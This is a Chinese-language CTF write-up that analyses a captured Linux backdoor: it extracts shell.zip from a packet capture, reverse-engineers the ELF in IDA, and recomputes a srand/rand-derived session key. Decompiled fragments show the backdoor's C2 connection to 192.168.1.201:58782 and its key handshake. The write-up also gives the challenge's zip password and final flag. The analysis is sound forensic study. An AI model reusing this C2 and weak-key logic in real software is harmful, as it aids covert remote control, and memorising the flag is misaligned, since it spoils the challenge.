SnakeBackdoor-5
根据题目5的要求分析,这题涉及流量文件提取与二进制逆向分析
基于之前的分析,我们已经知道攻击者下载了一个名为 shell.zip 的压缩包,并解压出了一个 ELF 二进制文件(在题目4中被重命名为 python3.13)
所以我们需要先将流量中的shell.zip文件提取出来,然后使用IDA进行逆向分析,定位网络通信函数,找到加密密钥,解题思路如下:
解题思路: 1、提取样本:从 Wireshark 流量中将 shell.zip 提取出来。 2、解压样本:使用题目 4 获得的密码 nf2jd092jd01 解压得到 ELF 文件。 3、逆向分析:使用 IDA Pro 或 Ghidra 打开 ELF 文件,定位网络通信函数,找出硬编码的加密密钥。 4、格式转换:将找到的字符串或字节流密钥转换为题目要求的小写 Hex 格式。1、提取木马本题文件
由题目4的分析结果知道,木马本题文件为shell.zip,并且使用密码nf2jd092jd01进行了加密
在 Wireshark 过滤器栏输入:http contains "shell.zip"(或者更精准地: http.request.uri contains "shell.zip")
点击菜单栏的 File (文件) => Export Objects (导出对象) => HTTP
在弹出的列表中,在文本过滤器中搜做".zip",找到文件名为 shell.zip 的那一行(Content-Type 通常为 application/zip),保存即可
2、解密压缩包
打开shell.zip压缩包,是经过加密的,输入题目4中得出的密码nf2jd092jd01,得到里面的木马本体二进制文件
3、逆向分析加密密钥
将shell二进制文件拖进IDA中
我们需要定位到网络通信函数,先找C2 服务器通信,密钥通常硬编码在数据段中
选择import窗口,找到inet_addr,双击定位到函数,选中函数,然后按下X键
双击.got.plt,选中地址或者函数,再次按X,弹窗之后再双击_inet_addr
选中_inet_addr,一样的操作,得到main函数的流程图视图
F5反编译得到伪代码
分析代码,是一个Linux C 语言编写的后门客户端
它的核心功能是:主动连接攻击者的服务器,通过某种协商机制生成加密密钥,然后循环接收攻击者的加密指令,执行后将结果加密回传
首先网络连接初始化,负责建立与 C2 服务器的 TCP 连接,IP: "192.168.1.201" 目标端口: 0xE59E(十进制为58782)
fd = socket(2, 1, 0); // 1. 创建套接字 (AF_INET=2, SOCK_STREAM=1) if ( fd < 0 ) exit(1); // 创建失败则退出 memset(&s, 48, 0x10uLL); // 初始化 sockaddr 结构体 s = 2; // 地址族 AF_INET v15 = inet_addr("192.168.1.201"); // 2. 目标 IP 地址 v14 = htons(0xE59Eu); // 3. 目标端口 // 4. 发起连接 if ( connect(fd, (const struct sockaddr *)&s, 0x10u) < 0 ) { close(fd); exit(1); }连接成功后,进行密钥协商与生成,木马没有直接发送数据,而是进行了一次“握手”来生成加密通信所需的密钥
这是一个基于 “种子同步” 的弱加密方案,使用4字节的随机数种子,生成16字节的密钥
// 1. 接收 4 字节数据 (Seed) if ( (unsigned int)sub_18ED((unsigned int)fd, &v7, 4LL, 0LL) != 4 ) ... // 2. 字节序转换 (Big-Endian 转 Little-Endian) seed = (*(_DWORD *)&v7 >> 8) & 0xFF00 | ... ; // 3. 设置随机数种子 srand(seed); // 4. 生成 16 字节密钥 for ( i = 0; i <= 3; ++i ) *(_DWORD *)&v8[4 * i] = rand(); // v8 就是最终的 Session Key // 5. 初始化加密上下文 (sub_13B4 可能是 KeyExpansion) sub_13B4(&v10, v8, 0LL); // 初始化解密上下文 v10 sub_13B4(&v9, v8, 1LL); // 初始化加密上下文 v9所以我们需要找到连接初期这 4 个字节的随机种子,然后在本地写代码模拟 srand 和 rand,从而计算出当次会话的所有加密密钥。
返回流量包,过滤出前面找到的IP和端口,在找出长度为4字节的数据包
ip.addr == 192.168.1.201 && tcp.port == 58782 && tcp.len == 4查看数据包中的数据内容
第一个数据包中的数据Data: 34952046是我们想要的4字节随机种子
后面数据包中的数据Data: 00000010、Data: 00000030等等,正好是 AES/RC4 等加密算法的常见块大小,或者是填充后的指令长度
4、编写脚本模拟计算出密钥
编写脚本
#include <stdio.h> #include <stdlib.h> #include <stdint.h> int main() { // 1. 设置你在 Wireshark 里找到的种子 // 数据包里的 hex 是 34 95 20 46,对应整数 0x34952046 unsigned int seed = 0x34952046; printf("[*] Seed: 0x%X\n", seed); // 2. 初始化随机数生成器 (模拟木马逻辑) srand(seed); printf("[+] Flag: flag{"); // 3. 生成 16 字节密钥 (4次 rand) for(int i = 0; i < 4; i++) { int r = rand(); // 模拟 Python 的 struct.pack("<I", r) -> 小端序输出 unsigned char *p = (unsigned char *)&r; printf("%02x%02x%02x%02x", p[0], p[1], p[2], p[3]); } printf("}\n"); return 0; }可以使用在线C语言编译器:https://www.onlinegdb.com/online_c_compiler
最终得到flag{ac46fb610b313b4f32fc642d8834b456}
